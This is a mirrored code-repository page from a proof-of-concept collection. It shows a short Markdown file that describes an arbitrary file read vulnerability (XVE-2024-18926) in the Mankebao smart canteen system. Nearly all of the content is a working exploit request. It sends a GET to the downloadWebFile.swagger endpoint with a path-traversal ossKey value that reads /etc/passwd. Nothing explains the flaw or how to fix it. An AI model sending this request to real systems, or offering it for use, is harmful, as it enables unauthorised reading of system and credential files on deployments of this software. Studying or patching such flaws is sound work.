admin/adysec_POC
1
0
Fork 0
mirror of https://github.com/adysec/POC.git synced 2025-11-05 02:13:47 +00:00
Code Issues Packages Projects Releases Wiki Activity
adysec_POC/wpoc/满客宝智慧食堂系统/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md

12 lines
249 B
Markdown
Raw Permalink Normal View History

wy876 POC backup
2025-03-07 18:18:50 +08:00
# 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)
## poc
```java
GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
Host
```
Reference in New Issue Copy Permalink